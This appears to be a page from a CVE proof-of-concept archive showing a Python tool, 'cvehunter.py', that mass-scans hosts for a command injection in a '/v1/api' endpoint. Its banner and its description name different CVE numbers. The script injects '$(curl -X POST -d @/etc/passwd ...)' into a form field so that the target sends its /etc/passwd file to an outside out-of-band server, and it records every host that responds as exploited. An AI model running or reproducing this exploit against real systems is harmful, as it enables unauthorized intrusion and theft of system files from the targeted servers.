4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cvehunter.py PY
import asyncio
import argparse
import aiofiles
from alive_progress import alive_bar
from fake_useragent import UserAgent
from colorama import Fore, Style
import ssl
import httpx
import random
import os
import json

green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [ green, cyan, blue]
random_color = random.choice(colors)


def banner():
    banner=f"""{bold}{red}

 ▄████▄ ██▒   █▓▓█████  ██░ ██  █    ██  ███▄    █ ▄▄▄█████▓▓█████  ██▀███  
▒██▀ ▀█▓██░   █▒▓█   ▀ ▓██░ ██▒ ██  ▓██▒ ██ ▀█   █ ▓  ██▒ ▓▒▓█   ▀ ▓██ ▒ ██▒
▒▓█    ▄▓██  █▒░▒███   ▒██▀▀██░▓██  ▒██░▓██  ▀█ ██▒▒ ▓██░ ▒░▒███   ▓██ ░▄█ ▒
▒▓▓▄ ▄██▒▒██ █░░▒▓█  ▄ ░▓█ ░██ ▓▓█  ░██░▓██▒  ▐▌██▒░ ▓██▓ ░ ▒▓█  ▄ ▒██▀▀█▄  
▒ ▓███▀ ░ ▒▀█░  ░▒████▒░▓█▒░██▓▒▒█████▓ ▒██░   ▓██░  ▒██▒ ░ ░▒████▒░██▓ ▒██▒
░ ░▒ ▒  ░ ░ ▐░  ░░ ▒░ ░ ▒ ░░▒░▒░▒▓▒ ▒ ▒ ░ ▒░   ▒ ▒   ▒ ░░   ░░ ▒░ ░░ ▒▓ ░▒▓░
  ░  ▒    ░ ░░   ░ ░  ░ ▒ ░▒░ ░░░▒░ ░ ░ ░ ░░   ░ ▒░    ░     ░ ░  ░  ░▒ ░ ▒░
░           ░░     ░    ░  ░░ ░ ░░░ ░ ░    ░   ░ ░   ░         ░     ░░   ░ 
░ ░          ░     ░  ░ ░  ░  ░   ░              ░             ░  ░   ░     
░           ░                                                               
   {bold}{white} CVE-2024-50603                      {bold}{white}@th3gokul & @th3sanjai{reset}\n"""
    return banner


print (banner())



parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation  tool for CVE-2024-34102" , usage=argparse.SUPPRESS)
parser.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or domain for vulnerability detection")
parser.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs for vulnerability detection")
parser.add_argument("-t", "--threads", type=int, default=1, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Number of threads for list of URLs")
parser.add_argument("-proxy", "--proxy", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Proxy URL to send request via your proxy")
parser.add_argument("-v", "--verbose", action="store_true", help=f"[{bold}{blue}INF{reset}]: {bold}{white}Increases verbosity of output in console")
parser.add_argument("-o", "--output", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Filename to save output of vulnerable target{reset}]")
parser.add_argument("-to", "--timeout", type=int, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a timeout value for the HTTP request{reset}")
args=parser.parse_args()

async def get_instance(session):
    try:
        base_url = f"https://api.cvssadvisor.com/ssrf/api/instance"
        headers = {
            "User-Agent": UserAgent().random,
            "Referer": "https://ssrf.cvssadvisor.com/",
            "Content-Type": "application/json",
            "Orgin": "https://ssrf.cvssadvisor.com"
        }
        
        response = await  session.request("POST", base_url,headers=headers, timeout=30, follow_redirects=True)
        responsed = response.text
        value = responsed.strip('"')
        return value
    except (httpx.ConnectError, httpx.RequestError, httpx.TimeoutException) as e:
        return 
    except ssl.SSLError as e:
        pass
    except httpx.InvalidURL:
        pass
    except KeyboardInterrupt :
        SystemExit
    except asyncio.CancelledError:
        SystemExit
    except Exception as e:
        if args.verbose:
            print(f"Exception in get-instance: {e}, {type(e)}")

async def delete_instance(session, instance_id):
    try:
        base_url = f"https://api.cvssadvisor.com/ssrf/api/instance/{instance_id}"
        headers = {
            "User-Agent": UserAgent().random,
            "Referer": "https://ssrf.cvssadvisor.com/",
            "Content-Type": "application/json",
            "Orgin": "https://ssrf.cvssadvisor.com"
        }
        
        response = await  session.request("DELETE", base_url,headers=headers, timeout=30, follow_redirects=True)
        if response.status_code == 200:
            pass
        
    except (httpx.ConnectError, httpx.RequestError, httpx.TimeoutException) as e:
        return 
    except ssl.SSLError as e:
        pass
    except httpx.InvalidURL:
        pass
    except KeyboardInterrupt :
        SystemExit
    except asyncio.CancelledError:
        SystemExit
    except Exception as e:
        if args.verbose:
            print(f"Exception in delete: {e}, {type(e)}")

async def instance_log(session, instance_id, url):
    try:
        base_url = f"https://api.cvssadvisor.com/ssrf/api/instance/{instance_id}"
        headers = {
            "User-Agent": UserAgent().random,
            "Referer": "https://ssrf.cvssadvisor.com/",
            "Content-Type": "application/json",
            "Orgin": "https://ssrf.cvssadvisor.com"
        }
        
        response = await  session.request("GET", base_url,headers=headers, timeout=30, follow_redirects=True)
        data = response.json()
        raw_data = json.dumps(data)
        
        if f"{url}" in raw_data:
            return "exploited"
        else:
            return "failed"
        
    except (httpx.ConnectError, httpx.RequestError, httpx.TimeoutException) as e:
        return 
    except ssl.SSLError as e:
        pass
    except httpx.InvalidURL:
        pass
    except KeyboardInterrupt :
        SystemExit
    except asyncio.CancelledError:
        SystemExit
    except Exception as e:
        if args.verbose:
            print(f"Exception in log: {e}, {type(e)}")

async def instance_clear(session, instance_id):
    try:
        base_url = f"https://api.cvssadvisor.com/ssrf/api/instance/{instance_id}/clear"
        headers = {
            "User-Agent": UserAgent().random,
            "Referer": "https://ssrf.cvssadvisor.com/",
            "Content-Type": "application/json",
            "Orgin": "https://ssrf.cvssadvisor.com"
        }
        
        response =  session.request("DELETE", base_url,headers=headers, timeout=30, follow_redirects=True) 
        if response.status_code == 200:
            pass
        
    except (httpx.ConnectError, httpx.RequestError, httpx.TimeoutException) as e:
        return 
    except ssl.SSLError as e:
        pass
    except httpx.InvalidURL:
        pass
    except KeyboardInterrupt :
        SystemExit
    except asyncio.CancelledError:
        SystemExit
    except Exception as e:
        if args.verbose:
            print(f"Exception in clear: {e}, {type(e)}")

async def save(result):
    try:
            if args.output:
                if os.path.isfile(args.output):
                    filename = args.output
                elif os.path.isdir(args.output):
                    filename = os.path.join(args.output, f"results.txt")
                else:
                    filename = args.output
            else:
                    filename = "results.txt"
            async with aiofiles.open(filename, "a") as w:
                    await w.write(result + '\n')
    except KeyboardInterrupt as e:        
        quit()
    except asyncio.CancelledError as e:
        SystemExit
    except Exception as e:
        pass


async def request(session,url,instance_url):
    try:
        base_url=f"{url}/v1/api"
        header={
            "User-Agent": UserAgent().random,
            "Content-Type": "application/x-www-form-urlencoded"
        }

        body = (
        "action=list_flightpath_destination_instances&"
        "CID=anything_goes_here&"
        "account_name=1&"
        "region=1&"
        "vpc_id_name=1&"
        f"cloud_type=1|$(curl%20-X%20POST%20-d%20@/etc/passwd%20{instance_url}/?url={url})"
    )
        
        response = await  session.request("POST", base_url, data=body, headers=header , follow_redirects=True)
    except (httpx.ConnectError, httpx.RequestError, httpx.TimeoutException) as e:
        return 
    except ssl.SSLError as e:
        pass
    except httpx.InvalidURL:
        pass
    except KeyboardInterrupt :
        SystemExit
    except asyncio.CancelledError:
        SystemExit
    except Exception as e:
        if args.verbose:
            print(f"Exception in request module: {e}, {type(e)}")



async def Exploit(session, url, instance_id, sem, bar):
    try:
        
        await request(session, url, f"https://{instance_id}.c5.rs")

        result = await instance_log(session, instance_id, url)
        
        if result == "exploited":
            print(f"[{bold}{green}VULN{reset}]: {bold}{white}{url}{reset}")
            await save(url)        
    except KeyboardInterrupt as e:
        SystemExit
    except asyncio.CancelledError as e:
        SystemExit   
    except Exception as e:
        if args.verbose:
            print(f"Exception in exploit: {e}, {type(e)}")
    finally:
        bar()
        sem.release()

async def loader(urls, session,instance_id, sem, bar):
    try:
        tasks = []
        for url in urls:
            await sem.acquire() 
            task = asyncio.ensure_future(Exploit(session, url,instance_id, sem, bar))
            tasks.append(task)
        await asyncio.gather(*tasks, return_exceptions=False)
    except KeyboardInterrupt as e:
        SystemExit
    except asyncio.CancelledError as e:
        SystemExit
    except Exception as e:
        if args.verbose:
            print(f"Exception in loader: {e}, {type(e)}")

async def setup(urls):
    try:
        urls = list(set(urls))
    
        sem = asyncio.Semaphore(args.threads)
        proxy = args.proxy if args.proxy else None
        timeout = httpx.Timeout(connect=args.timeout, pool=args.threads*2, write=None, read=80.0)
        limits = httpx.Limits(max_connections=args.threads, max_keepalive_connections=args.threads)
        async with httpx.AsyncClient(verify=False, proxy=proxy, timeout=timeout, limits=limits) as session:
            instance = await get_instance(session)
            if not instance :
                print(f"[{bold}{red}INFO{reset}]: {bold}{white}Unable to create a interactive SSRF server Please run again!{reset}")
                exit(1)
            with alive_bar(title=f"CVEHunter", total=len(urls), enrich_print=False) as bar:
                await loader(urls, session,instance, sem, bar)
                await delete_instance(session,instance)
    except RuntimeError as e:
        pass
    except KeyboardInterrupt as e:
        SystemExit
    except Exception as e:
        if args.verbose:
            print(f"Exception in threads: {e}, {type(e)}")


async def main():
    try:
        urls = []
        if args.url:
            if args.url.startswith("https://") or args.url.startswith("http://"):
                urls.append(args.url)
            else:
                new_url = f"https://{args.url}"
                urls.append(new_url)
                new_http = f"http://{args.url}"
                urls.append(new_http)
            await setup(urls)
                
        if args.list:
            async with aiofiles.open(args.list, "r") as streamr:
                async for url in streamr:
                    url = url.strip()
                    if url.startswith("https://") or url.startswith("http://"):
                        urls.append(url)
                    else:
                        new_url = f"https://{url}"
                        urls.append(new_url)
                        new_http = f"http://{url}"
                        urls.append(new_http)
            await setup(urls)

    except FileNotFoundError as e:
        print(f"[{bold}{red}WRN{reset}]: {bold}{white}{args.list} no such file or directory{reset}")
        SystemExit
        
    except Exception as e:
        print(f"Exception in main: {e}, {type(e)}")

if __name__ == "__main__":
    asyncio.run(main())